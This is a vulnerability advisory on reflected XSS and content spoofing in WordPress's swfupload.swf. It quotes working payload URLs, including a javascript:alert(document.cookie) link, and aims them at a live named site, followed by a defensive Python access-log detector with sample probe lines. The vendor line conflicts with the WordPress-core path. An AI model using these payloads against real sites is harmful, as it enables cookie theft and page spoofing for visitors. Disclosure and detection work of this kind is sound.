#########################################################
# Title : Cross Site Scripting in RedTube Official Blog.
# Author : Ryuzaki Lawlet
# Blog : justryuz.blogspot.com / www.justryuz.com
# E-mail : ryuzaki_l@y7mail.com / justryuz@facebook.com / justryuz@linuxmail.org
# Date: June 6/2013 (4.44 pm)
# Vendor: http://wordpress.org/plugins/nextgen-gallery/
# Type : Web Apps
# Vector of operation: Remote
# Impact: Cross Site Scripting & Content Spoofing
# Tested on : Ubuntu / Window XP
##########################################################

*Description:

The vulnerability is caused by insufficient input validation of the "movieName" and "buttonText" parameters, which swfupload.swf passes to "ExternalInterface.call()". This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

There are two vulnerabilities in RedTube Official Blog.

*Content Spoofing

http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'>

It's possible to inject text, images and HTML (e.g. for link injection).

*Cross-Site Scripting

http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>

or

http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xss");//

Code will execute after click. It's strictly social XSS.

*Proof of Concept Code

http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?movieName=[XSS]
http://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'>

*Live Preview

http://blog.redtube.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xss");//
http://blog.redtube.com/wp-includes/js/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
http://blog.redtube.com/wp-includes/js/swfupload/swfupload.swf?buttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'>

*Screenshot

https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-ash4/182547_425615577534257_1920413802_n.jpg

*Solution:

On the server side, you can upgrade to a non-vulnerable version. On the client side you can use a browser that obeys the Content-Type header specified by the server, such as Mozilla Firefox, Google Chrome, Apple Safari or Opera. Internet Explorer 8 with the XSS Filter won't execute the malicious scripts.

Ref: http://justryuz.blogspot.com/2013/05/title-cross-site-scripting-in-redtube.html
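The two parameters named in the description, movieName and buttonText, are passed straight from the query string into the Flash object's flashvars, so exploitation attempts leave a recognisable trace in the web server access log: a GET for swfupload.swf whose movieName or buttonText carries HTML metacharacters or a string-delimiter breakout. The following detector is an added example written for this advisory; it is not part of the original post or of SWFUpload/WordPress. The log lines, the combined-log regex and the `example.invalid` image host are constructed for the demonstration; the two payload values are the ones quoted in the advisory, URL-encoded as they would appear in a log.

```python
"""Flag access-log requests that probe swfupload.swf's movieName/buttonText flashvars."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Path of the legacy SWFUpload Flash object shipped with older WordPress releases.
SWFUPLOAD_PATH = re.compile(r"/swfupload/swfupload\.swf$", re.IGNORECASE)

# The two flashvars the advisory names as reaching ExternalInterface.call() unvalidated.
WATCHED_PARAMS = {"movieName", "buttonText"}

# Tokens that have no business in a movie name or button label: HTML
# metacharacters, JS string delimiters (the movieName payload opens with one),
# javascript: URLs and a bare alert( call.
SUSPICIOUS = re.compile(r"""[<>"']|javascript:|alert\s*\(""", re.IGNORECASE)

# Apache/nginx "combined" access-log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample log (not from the advisory). Line 1 is a normal load with
# the movieName WordPress itself assigns; lines 2 and 3 carry the advisory's
# movieName and buttonText payloads URL-encoded; line 4 is an unrelated request
# that contains "<" but never touches swfupload.swf.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Jun/2013:16:44:01 +0800] "GET /wp-includes/js/swfupload/swfupload.swf?movieName=SWFUpload_0 HTTP/1.1" 200 11423
203.0.113.9 - - [06/Jun/2013:16:44:05 +0800] "GET /wp-includes/js/swfupload/swfupload.swf?movieName=%22%5D%29%3B%7Dcatch%28e%29%7B%7Dif%28%21self.a%29self.a%3D%21alert%28%22xss%22%29%3B%2F%2F HTTP/1.1" 200 11423
203.0.113.9 - - [06/Jun/2013:16:44:09 +0800] "GET /wp-includes/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src%3D%27http://example.invalid/x.jpg%27%3E HTTP/1.1" 200 11423
198.51.100.4 - - [06/Jun/2013:16:45:00 +0800] "GET /index.php?s=%3Cb%3Ehello%3C/b%3E HTTP/1.1" 200 5120
"""


def suspicious_params(target):
    """Return [(name, decoded_value)] for watched flashvars that look injected.

    Returns [] for any request that is not for swfupload.swf, or whose watched
    parameters look like a plain identifier or label.
    """
    parts = urlsplit(target)
    if not SWFUPLOAD_PATH.search(parts.path):
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name not in WATCHED_PARAMS:
            continue
        # parse_qsl has decoded once already; decode a second time so a
        # double-encoded probe (%253C -> %3C -> <) is caught as well.
        decoded = unquote(value)
        if SUSPICIOUS.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(text):
    """Parse combined-format access-log text; one finding per swfupload.swf probe."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']}")
        for name, value in f["params"]:
            print(f"    {name} = {value!r}")
```

Run against the sample, the detector reports the two requests from 203.0.113.9 and stays silent on the legitimate `movieName=SWFUpload_0` load and on the unrelated `index.php` request. A 200 status on a flagged line means the .swf is still being served, which is the real finding: the fix the advisory recommends (upgrading so the vulnerable swfupload.swf is no longer present) turns those into 404s, and the scanner makes that easy to confirm from the logs.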